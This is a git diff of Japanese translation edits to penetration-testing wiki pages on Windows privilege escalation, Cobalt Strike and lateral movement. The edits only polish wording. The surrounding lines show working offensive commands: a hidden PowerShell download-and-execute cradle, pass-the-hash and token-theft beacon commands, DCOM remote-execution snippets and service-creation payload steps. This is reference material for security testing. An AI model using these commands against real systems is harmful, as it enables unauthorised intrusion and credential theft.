CDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aa5-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;5cb41ed0-0e4c-11d0-a286-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;WD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;CO)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;c975c901-6cea-4b6f-8319-d67f45449506;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;f0f8ffac-1191-11d0-a060-00aa006c33ed;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CINPIO;RPWPLOSD;;e8b2aff2-59a7-4eac-9a70-819adef701dd;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;NS)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;AU)(OA;CI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;LCSWRPWPRC;;;S-1-5-21-3842939050-3880317879-2865463114-5213)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5172)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5187)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3842939050-3880317879-2865463114-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;CI;LCRPWPRC;;;AN)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)"
 
diff --git a/src/windows-hardening/basic-powershell-for-pentesters/powerview.md b/src/windows-hardening/basic-powershell-for-pentesters/powerview.md
index 30adb0060..2b19153b7 100644
--- a/src/windows-hardening/basic-powershell-for-pentesters/powerview.md
+++ b/src/windows-hardening/basic-powershell-for-pentesters/powerview.md
@@ -171,7 +171,7 @@ Get-DomainGPOLocalGroup | select GPODisplayName, GroupName, GPOType
 # Enumerates the machines where a specific domain user/group is a member of a specific local group.
 Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName
 ```
-権限を**GPOとACLを通じて悪用する**方法を学びます：
+権限を**GPOとACLを利用して悪用する**方法を学びます：
 
 {{#ref}}
 ../active-directory-methodology/acl-persistence-abuse/
@@ -221,7 +221,7 @@ Get-NetForestTrust #Get forest trusts (it must be between 2 roots, trust between
 Get-DomainForeingUser #Get users with privileges in other domains inside the forest
 Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest
 ```
-### 低い位置にある果実
+### 低い果実
 ```powershell
 #Check if any user passwords are set
 $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
diff --git a/src/windows-hardening/checklist-windows-privilege-escalation.md b/src/windows-hardening/checklist-windows-privilege-escalation.md
index e8d38e2da..8ca5df84b 100644
--- a/src/windows-hardening/checklist-windows-privilege-escalation.md
+++ b/src/windows-hardening/checklist-windows-privilege-escalation.md
@@ -19,28 +19,28 @@
 
 ### [ログ/AV列挙](windows-local-privilege-escalation/#enumeration)
 
-- [ ] [**監査**](windows-local-privilege-escalation/#audit-settings)と[**WEF**](windows-local-privilege-escalation/#wef)設定を確認
+- [ ] [**監査**](windows-local-privilege-escalation/#audit-settings)と[**WEF**](windows-local-privilege-escalation/#wef)の設定を確認
 - [ ] [**LAPS**](windows-local-privilege-escalation/#laps)を確認
 - [ ] [**WDigest**](windows-local-privilege-escalation/#wdigest)がアクティブか確認
 - [ ] [**LSA保護**](windows-local-privilege-escalation/#lsa-protection)は？
 - [ ] [**Credentials Guard**](windows-local-privilege-escalation/#credentials-guard)[?](windows-local-privilege-escalation/#cached-credentials)
 - [ ] [**キャッシュされた資格情報**](windows-local-privilege-escalation/#cached-credentials)は？
-- [ ] 何らかの[**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)があるか確認
+- [ ] [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)が有効か確認
 - [ ] [**AppLockerポリシー**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)は？
-- [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md)
+- [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md)は？
 - [ ] [**ユーザー特権**](windows-local-privilege-escalation/#users-and-groups)
 - [ ] [**現在の**ユーザーの**特権**](windows-local-privilege-escalation/#users-and-groups)を確認
 - [ ] [**特権グループのメンバーですか**](windows-local-privilege-escalation/#privileged-groups)？
 - [ ] [これらのトークンが有効か確認](windows-local-privilege-escalation/#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
 - [ ] [**ユーザーセッション**](windows-local-privilege-escalation/#logged-users-sessions)は？
-- [ ] [**ユーザーのホーム**](windows-local-privilege-escalation/#home-folders)を確認（アクセス？）
+- [ ] [**ユーザーのホーム**](windows-local-privilege-escalation/#home-folders)を確認（アクセス可能か？）
 - [ ] [**パスワードポリシー**](windows-local-privilege-escalation/#password-policy)を確認
 - [ ] [**クリップボードの中身**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard)は何ですか？
 
 ### [ネットワーク](windows-local-privilege-escalation/#network)
 
 - [ ] **現在の**[**ネットワーク情報**](windows-local-privilege-escalation/#network)を確認
-- [ ] 外部に制限された**隠れたローカルサービス**を確認
+- [ ] **外部に制限された隠れたローカルサービス**を確認
 
 ### [実行中のプロセス](windows-local-privilege-escalation/#running-processes)
 
@@ -51,10 +51,10 @@
 
 ### [サービス](windows-local-privilege-escalation/#services)
 
-- [ ] [**任意のサービスを変更できますか**](windows-local-privilege-escalation/#permissions)？
-- [ ] [**任意のサービスによって実行される**バイナリを**変更できますか**](windows-local-privilege-escalation/#modify-service-binary-path)？
-- [ ] [**任意のサービスの**レジストリを**変更できますか**](windows-local-privilege-escalation/#services-registry-modify-permissions)？
-- [ ] [**引用されていないサービスの**バイナリ**パスを利用できますか**](windows-local-privilege-escalation/#unquoted-service-paths)？
+- [ ] [**サービスを変更できますか**](windows-local-privilege-escalation/#permissions)？
+- [ ] [**サービスによって実行される**バイナリを**変更できますか**](windows-local-privilege-escalation/#modify-service-binary-path)？
+- [ ] [**サービスの**レジストリを**変更できますか**](windows-local-privilege-escalation/#services-registry-modify-permissions)？
+- [ ] [**引用符のないサービス**バイナリの**パスを利用できますか**](windows-local-privilege-escalation/#unquoted-service-paths)？
 
 ### [**アプリケーション**](windows-local-privilege-escalation/#applications)
 
@@ -64,9 +64,9 @@
 
 ### [DLLハイジャック](windows-local-privilege-escalation/#path-dll-hijacking)
 
-- [ ] **PATH内の任意のフォルダに書き込むことができますか**？
+- [ ] **PATH内の任意のフォルダに書き込めますか**？
 - [ ] **存在しないDLLを読み込もうとする**既知のサービスバイナリはありますか？
-- [ ] **任意のバイナリフォルダに書き込むことができますか**？
+- [ ] **任意のバイナリフォルダに書き込めますか**？
 
 ### [ネットワーク](windows-local-privilege-escalation/#network)
 
@@ -75,31 +75,31 @@
 
 ### [Windows資格情報](windows-local-privilege-escalation/#windows-credentials)
 
-- [ ] [**Winlogon**](windows-local-privilege-escalation/#winlogon-credentials)資格情報
+- [ ] [**Winlogon**](windows-local-privilege-escalation/#winlogon-credentials)の資格情報
 - [ ] [**Windows Vault**](windows-local-privilege-escalation/#credentials-manager-windows-vault)の資格情報は使用できますか？
 - [ ] 興味深い[**DPAPI資格情報**](windows-local-privilege-escalation/#dpapi)は？
 - [ ] 保存された[**Wifiネットワーク**](windows-local-privilege-escalation/#wifi)のパスワードは？
 - [ ] [**保存されたRDP接続**](windows-local-privilege-escalation/#saved-rdp-connections)に興味深い情報はありますか？
 - [ ] [**最近実行されたコマンド**](windows-local-privilege-escalation/#recently-run-commands)のパスワードは？
 - [ ] [**リモートデスクトップ資格情報マネージャー**](windows-local-privilege-escalation/#remote-desktop-credential-manager)のパスワードは？
-- [ ] [**AppCmd.exe**が存在します](windows-local-privilege-escalation/#appcmd-exe)か？資格情報は？
+- [ ] [**AppCmd.exe**が存在しますか](windows-local-privilege-escalation/#appcmd-exe)？資格情報は？
 - [ ] [**SCClient.exe**](windows-local-privilege-escalation/#scclient-sccm)は？DLLサイドローディング？
 
 ### [ファイルとレジストリ（資格情報）](windows-local-privilege-escalation/#files-and-registry-credentials)
 
 - [ ] **Putty:** [**資格情報**](windows-local-privilege-escalation/#putty-creds) **と** [**SSHホストキー**](windows-local-privilege-escalation/#putty-ssh-host-keys)
 - [ ] [**レジストリ内のSSHキー**](windows-local-privilege-escalation/#ssh-keys-in-registry)は？
-- [ ] [**無人ファイル**](windows-local-privilege-escalation/#unattended-files)にパスワードは？
+- [ ] [**無人ファイル**](windows-local-privilege-escalation/#unattended-files)のパスワードは？
 - [ ] [**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups)のバックアップはありますか？
 - [ ] [**クラウド資格情報**](windows-local-privilege-escalation/#cloud-credentials)は？
 - [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist.xml)ファイルは？
 - [ ] [**キャッシュされたGPPパスワード**](windows-local-privilege-escalation/#cached-gpp-pasword)は？
-- [ ] [**IIS Web構成ファイル**](windows-local-privilege-escalation/#iis-web-config)にパスワードは？
+- [ ] [**IIS Web構成ファイル**](windows-local-privilege-escalation/#iis-web-config)のパスワードは？
 - [ ] [**ウェブログ**](windows-local-privilege-escalation/#logs)に興味深い情報はありますか？
 - [ ] ユーザーに[**資格情報を要求**](windows-local-privilege-escalation/#ask-for-credentials)したいですか？
 - [ ] [**ごみ箱内の興味深いファイル**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)は？
 - [ ] 他の[**資格情報を含むレジストリ**](windows-local-privilege-escalation/#inside-the-registry)は？
-- [ ] [**ブラウザデータ**](windows-local-privilege-escalation/#browsers-history)内（dbs、履歴、ブックマーク、...）？
+- [ ] [**ブラウザデータ内**](windows-local-privilege-escalation/#browsers-history)（dbs、履歴、ブックマーク、...）は？
 - [ ] [**ファイルとレジストリ内の一般的なパスワード検索**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry)は？
 - [ ] パスワードを自動的に検索するための[**ツール**](windows-local-privilege-escalation/#tools-that-search-for-passwords)は？
 
diff --git a/src/windows-hardening/cobalt-strike.md b/src/windows-hardening/cobalt-strike.md
index ec29ecd6f..2498aaf4d 100644
--- a/src/windows-hardening/cobalt-strike.md
+++ b/src/windows-hardening/cobalt-strike.md
@@ -17,7 +17,7 @@
 
 ### ペイロードの生成とホスティング
 
-#### ファイル内のペイロードの生成
+#### ファイル内でのペイロードの生成
 
 `Attacks -> Packages ->`&#x20;
 
@@ -28,7 +28,7 @@
 
 #### ペイロードの生成とホスティング
 
-`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` これにより、Cobalt Strikeからビークンをダウンロードするためのスクリプト/実行可能ファイルが生成されます。形式は bitsadmin、exe、powershell、python などです。
+`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` これにより、cobalt strikeからビークンをダウンロードするためのスクリプト/実行可能ファイルが生成されます。形式は bitsadmin、exe、powershell、python などです。
 
 #### ペイロードのホスティング
 
@@ -50,11 +50,11 @@ keylogger [pid] [x86|x64]
 ## 表示 > キーストロークで押されたキーを確認する
 
 # ポートスキャン
-portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # 別のプロセス内にポートスキャンアクションを注入
+portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # 別のプロセス内でポートスキャンアクションを注入
 portscan [targets] [ports] [arp|icmp|none] [max connections]
 
-# PowerShell
-# PowerShell モジュールをインポート
+# Powershell
+# Powershell モジュールをインポート
 powershell-import C:\path\to\PowerView.ps1
 powershell &#x3C;ここにpowershellコマンドを記述>
 
@@ -73,7 +73,7 @@ runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.w
 ## pidからトークンを盗む
 ## make_tokenのようですが、プロセスからトークンを盗む
 steal_token [pid] # これはネットワークアクションに役立ちますが、ローカルアクションには役立ちません
-## APIドキュメントから、このログオンタイプは「呼び出し元が現在のトークンをクローンできることを許可します」とわかります。これが、ビークンの出力に「なりすまし &#x3C;current_username>」と表示される理由です - 自分のクローントークンをなりすましています。
+## APIドキュメントから、このログオンタイプは「呼び出し元が現在のトークンをクローンすることを許可します」とわかります。これが、ビークンの出力に「なりすまし &#x3C;current_username>」と表示される理由です - 自分のクローントークンをなりすましています。
 ls \\computer_name\c$ # 生成したトークンを使用してコンピュータのC$にアクセスを試みる
 rev2self # steal_tokenからのトークンの使用を停止
 
@@ -86,7 +86,7 @@ inject [pid] [x64|x86] [listener]
 ## OpSecの観点から: 本当に必要でない限り、クロスプラットフォームの注入は行わないでください（例: x86 -> x64 または x64 -> x86）。
 
 ## ハッシュをパス
-## この修正プロセスは、LSASSメモリのパッチを必要とし、高リスクのアクションであり、ローカル管理者権限が必要で、Protected Process Light (PPL) が有効な場合はあまり実行可能ではありません。
+## この修正プロセスはLSASSメモリのパッチを必要とし、高リスクのアクションであり、ローカル管理者権限が必要で、Protected Process Light (PPL) が有効な場合はあまり実行可能ではありません。
 pth [pid] [arch] [DOMAIN\user] [NTLM hash]
 pth [DOMAIN\user] [NTLM hash]
 
@@ -98,9 +98,9 @@ steal_token &#x3C;pid> # mimikatzによって作成されたプロセスから
 ## チケットをパス
 ## チケットをリクエスト
 execute-assembly C:\path\Rubeus.exe asktgt /user:&#x3C;username> /domain:&#x3C;domain> /aes256:&#x3C;aes_keys> /nowrap /opsec
-## 新しいチケットを使用するための新しいログオンセッションを作成します（侵害されたものを上書きしないため）。
+## 新しいチケットを使用するための新しいログオンセッションを作成（侵害されたものを上書きしないため）
 make_token &#x3C;domain>\&#x3C;username> DummyPass
-## 攻撃者のマシンにチケットを書き込み、PowerShellセッションから読み込みます &#x26; 
+## 攻撃者のマシンにチケットを書き込み、poweshellセッションから読み込む &#x26; 
 [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
 kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
 
@@ -170,7 +170,7 @@ shinject &#x3C;pid> x64 C:\Payloads\msf.bin # x64プロセスにMetasploitシェ
 
 
 # ピボッティング
-## チームサーバーでソックスプロキシを開く
+## チームサーバーでsocksプロキシを開く
 beacon> socks 1080
 
 # SSH接続
@@ -180,7 +180,7 @@ beacon> ssh 10.10.17.12:22 username password</code></pre>
 
 ### アーティファクトキット
 
-通常、`/opt/cobaltstrike/artifact-kit` に、Cobalt Strikeがバイナリビークンを生成するために使用するコードと事前コンパイルされたテンプレート（`/src-common`内）を見つけることができます。
+通常、`/opt/cobaltstrike/artifact-kit` で、Cobalt Strikeがバイナリビークンを生成するために使用するコードと事前コンパイルされたテンプレート（`/src-common`内）を見つけることができます。
 
 生成されたバックドア（またはコンパイルされたテンプレート）を使用して [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) を使用すると、Defenderがトリガーされる原因を特定できます。通常は文字列です。したがって、バックドアを生成しているコードを修正して、その文字列が最終的なバイナリに表示されないようにすることができます。
 
@@ -192,7 +192,7 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
 
 ### Resource Kit
 
-ResourceKitフォルダーには、Cobalt Strikeのスクリプトベースのペイロード用のテンプレートが含まれています。これにはPowerShell、VBA、HTAが含まれます。
+ResourceKitフォルダーには、Cobalt Strikeのスクリプトベースのペイロードのテンプレートが含まれています。これにはPowerShell、VBA、HTAが含まれます。
 
 [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck)をテンプレートと一緒に使用することで、Defender（この場合はAMSI）が好まないものを見つけて修正できます。
 ```
diff --git a/src/windows-hardening/lateral-movement/dcom-exec.md b/src/windows-hardening/lateral-movement/dcom-exec.md
index 550af4bbc..4eb95565b 100644
--- a/src/windows-hardening/lateral-movement/dcom-exec.md
+++ b/src/windows-hardening/lateral-movement/dcom-exec.md
@@ -6,11 +6,11 @@
 
 **この技術に関する詳細は、[https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/)の元の投稿を確認してください。**
 
-Distributed Component Object Model (DCOM) オブジェクトは、オブジェクトとのネットワークベースの相互作用に対して興味深い機能を提供します。Microsoftは、DCOMおよびComponent Object Model (COM)に関する包括的なドキュメントを提供しており、[こちらでDCOM](https://msdn.microsoft.com/en-us/library/cc226801.aspx)と[こちらでCOM](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms694363(v=vs.85).aspx>)にアクセスできます。DCOMアプリケーションのリストは、PowerShellコマンドを使用して取得できます:
+分散コンポーネントオブジェクトモデル（DCOM）オブジェクトは、オブジェクトとのネットワークベースの相互作用に対して興味深い機能を提供します。Microsoftは、DCOMおよびコンポーネントオブジェクトモデル（COM）に関する包括的なドキュメントを提供しており、[DCOMについてはこちら](https://msdn.microsoft.com/en-us/library/cc226801.aspx)および[COMについてはこちら](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms694363(v=vs.85).aspx>)でアクセスできます。DCOMアプリケーションのリストは、PowerShellコマンドを使用して取得できます：
 ```bash
 Get-CimInstance Win32_DCOMApplication
 ```
-COMオブジェクト、[MMC Application Class (MMC20.Application)](https://technet.microsoft.com/en-us/library/cc181199.aspx)は、MMCスナップイン操作のスクリプトを可能にします。特に、このオブジェクトには`Document.ActiveView`の下に`ExecuteShellCommand`メソッドが含まれています。このメソッドに関する詳細情報は[こちら](<https://msdn.microsoft.com/en-us/library/aa815396(v=vs.85).aspx>)で確認できます。実行してみてください：
+COMオブジェクト、[MMC Application Class (MMC20.Application)](https://technet.microsoft.com/en-us/library/cc181199.aspx)は、MMCスナップイン操作のスクリプトを可能にします。特に、このオブジェクトには`Document.ActiveView`の下に`ExecuteShellCommand`メソッドが含まれています。このメソッドに関する詳細情報は[こちら](<https://msdn.microsoft.com/en-us/library/aa815396(v=vs.85).aspx>)で確認できます。実行を確認してください：
 
 この機能は、DCOMアプリケーションを介してネットワーク上でコマンドを実行することを容易にします。管理者としてDCOMにリモートで対話するために、PowerShellを次のように利用できます：
 ```powershell
@@ -42,20 +42,20 @@ ls \\10.10.10.10\c$\Users
 
 ### ShellWindows
 
-ProgID が欠如している `ShellWindows` に対して、.NET メソッド `Type.GetTypeFromCLSID` と `Activator.CreateInstance` を使用して、その AppID を用いてオブジェクトのインスタンス化を行います。このプロセスでは、OleView .NET を利用して `ShellWindows` の CLSID を取得します。インスタンス化された後は、`WindowsShell.Item` メソッドを通じて相互作用が可能で、`Document.Application.ShellExecute` のようなメソッド呼び出しが行えます。
+ProgID が欠如している `ShellWindows` に対しては、.NET メソッド `Type.GetTypeFromCLSID` と `Activator.CreateInstance` を使用して、その AppID を用いてオブジェクトのインスタンス化を行います。このプロセスでは、OleView .NET を利用して `ShellWindows` の CLSID を取得します。インスタンス化された後は、`WindowsShell.Item` メソッドを通じて相互作用が可能で、`Document.Application.ShellExecute` のようなメソッド呼び出しが行えます。
 
-オブジェクトをインスタンス化し、リモートでコマンドを実行するための PowerShell コマンドの例が提供されました:
+オブジェクトをインスタンス化し、リモートでコマンドを実行するための PowerShell コマンドの例が提供されました：
 ```powershell
 $com = [Type]::GetTypeFromCLSID("<clsid>", "<IP>")
 $obj = [System.Activator]::CreateInstance($com)
 $item = $obj.Item()
 $item.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "c:\windows\system32", $null, 0)
 ```
-### Lateral Movement with Excel DCOM Objects
+### Excel DCOMオブジェクトを使用した横移動
 
-ラテラルムーブメントは、DCOM Excelオブジェクトを悪用することで達成できます。詳細な情報については、[Cybereason's blog](https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom)でのDCOMを介したラテラルムーブメントのためのExcel DDEの活用に関する議論を読むことをお勧めします。
+横移動は、DCOM Excelオブジェクトを悪用することで実現できます。詳細な情報については、[Cybereasonのブログ](https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom)でのDCOMを介した横移動のためのExcel DDEの活用に関する議論を読むことをお勧めします。
 
-Empireプロジェクトは、DCOMオブジェクトを操作することによってExcelを使用したリモートコード実行（RCE）を示すPowerShellスクリプトを提供しています。以下は、[Empire's GitHub repository](https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1)で入手可能なスクリプトからのスニペットで、RCEのためにExcelを悪用するさまざまな方法を示しています：
+Empireプロジェクトは、DCOMオブジェクトを操作することによってExcelを使用したリモートコード実行（RCE）を示すPowerShellスクリプトを提供しています。以下は、[EmpireのGitHubリポジトリ](https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1)で入手可能なスクリプトのスニペットで、RCEのためにExcelを悪用するさまざまな方法を示しています：
 ```powershell
 # Detection of Office version
 elseif ($Method -Match "DetectOffice") {
@@ -82,7 +82,7 @@ $Obj.DDEInitiate("cmd", "/c $Command")
 
 これらの技術を自動化するために2つのツールが強調されています：
 
-- **Invoke-DCOM.ps1**: リモートマシンでコードを実行するためのさまざまなメソッドの呼び出しを簡素化するEmpireプロジェクトによって提供されたPowerShellスクリプト。このスクリプトはEmpire GitHubリポジトリで入手可能です。
+- **Invoke-DCOM.ps1**: リモートマシンでコードを実行するためのさまざまなメソッドの呼び出しを簡素化するEmpireプロジェクトによって提供されるPowerShellスクリプト。このスクリプトはEmpire GitHubリポジトリで入手可能です。
 
 - **SharpLateral**: リモートでコードを実行するために設計されたツールで、次のコマンドで使用できます：
 ```bash
diff --git a/src/windows-hardening/lateral-movement/psexec-and-winexec.md b/src/windows-hardening/lateral-movement/psexec-and-winexec.md
index fce8c1ad9..a35a29e0c 100644
--- a/src/windows-hardening/lateral-movement/psexec-and-winexec.md
+++ b/src/windows-hardening/lateral-movement/psexec-and-winexec.md
@@ -13,15 +13,15 @@
 
 ### **PsExecを手動で実行するプロセス**
 
-msfvenomで作成され、Veilを使用してウイルス対策検出を回避するように難読化された実行可能ペイロード「met8888.exe」を仮定すると、以下のステップが取られます：
+msfvenomで作成され、Veilを使用してウイルス対策ソフトウェアの検出を回避するように難読化された実行可能ペイロード「met8888.exe」を仮定すると、以下のステップが取られます：
 
 - **バイナリのコピー**：実行可能ファイルはコマンドプロンプトからADMIN$共有にコピーされますが、ファイルシステムのどこにでも配置して隠すことができます。
 - **サービスの作成**：Windowsの`sc`コマンドを使用して、リモートでWindowsサービスを照会、作成、削除することができ、「meterpreter」という名前のサービスがアップロードされたバイナリを指すように作成されます。
-- **サービスの開始**：最終ステップはサービスを開始することで、バイナリが本物のサービスバイナリでないため、期待される応答コードを返さず「タイムアウト」エラーが発生する可能性があります。このエラーは、主な目的がバイナリの実行であるため、重要ではありません。
+- **サービスの開始**：最終ステップはサービスを開始することで、バイナリが本物のサービスバイナリでないため、期待される応答コードを返さずに「タイムアウト」エラーが発生する可能性があります。このエラーは、バイナリの実行が主な目的であるため、重要ではありません。
 
 Metasploitリスナーを観察すると、セッションが正常に開始されたことがわかります。
 
-[Learn more about the `sc` command](https://technet.microsoft.com/en-us/library/bb490995.aspx).
+[`sc`コマンドの詳細を学ぶ](https://technet.microsoft.com/en-us/library/bb490995.aspx)。
 
 詳細な手順については、[https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)を参照してください。
 
diff --git a/src/windows-hardening/lateral-movement/smbexec.md b/src/windows-hardening/lateral-movement/smbexec.md
index 7ced7267e..01a9f0ec6 100644
--- a/src/windows-hardening/lateral-movement/smbexec.md
+++ b/src/windows-hardening/lateral-movement/smbexec.md
@@ -22,7 +22,7 @@ smbexec.py WORKGROUP/genericuser:genericpassword@10.10.10.10
 
 ### コマンドの例
 
-サービスを作成して開始するには、以下のコマンドを使用できます：
+サービスの作成と開始は、以下のコマンドで実行できます：
 ```bash
 sc create [ServiceName] binPath= "cmd.exe /c [PayloadCommand]"
 sc start [ServiceName]
diff --git a/src/windows-hardening/lateral-movement/winrm.md b/src/windows-hardening/lateral-movement/winrm.md
index 7eaf5b6ab..909e0427a 100644
--- a/src/windows-hardening/lateral-movement/winrm.md
+++ b/src/windows-hardening/lateral-movement/winrm.md
@@ -2,6 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-[**WinRMについてはこのページを参照してください**](../../network-services-pentesting/5985-5986-pentesting-winrm.md)の情報。
+[**WinRMについての情報はこのページを参照してください**](../../network-services-pentesting/5985-5986-pentesting-winrm.md)。
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/lateral-movement/wmiexec.md b/src/windows-hardening/lateral-movement/wmiexec.md
index a28b3bcf3..73b58940c 100644
--- a/src/windows-hardening/lateral-movement/wmiexec.md
+++ b/src/windows-hardening/lateral-movement/wmiexec.md
@@ -6,7 +6,7 @@
 
 ユーザー名とパスワードまたはハッシュが知られているホスト上でプロセスを開くことができます。WMIを使用してコマンドが実行され、Wmiexecによってセミインタラクティブなシェル体験が提供されます。
 
